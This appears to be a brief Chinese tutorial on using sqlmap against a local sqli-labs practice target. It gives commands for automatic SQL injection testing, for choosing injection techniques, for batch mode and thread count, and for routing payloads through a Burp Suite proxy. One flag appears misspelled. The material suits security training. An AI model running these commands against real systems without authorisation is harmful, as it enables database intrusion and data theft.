一、不指定注入类型,会自动进行多种注入测试
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"
二、指定注入
1、指定联合注入
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique U
2、指定联合加布尔注入
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --technique UB
三、指定其他注入
1、B:布尔注入
2、E:报错注入
3、U:联合注入
4、S:语句查询注入
5、T:延时注入
四、自动选择默认提示,不会弹出提示框让我们选择yes或no
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --batch
五、指定线程数,最大线程数是10
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --thread 5 --batch
六、设置代理
1、先设置好代理
2、sqlmap指定代理服务器
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --proxy="http://127.0.0.1:8080"
3、发送的所有payload,我们在BurpSuite中都可以看到
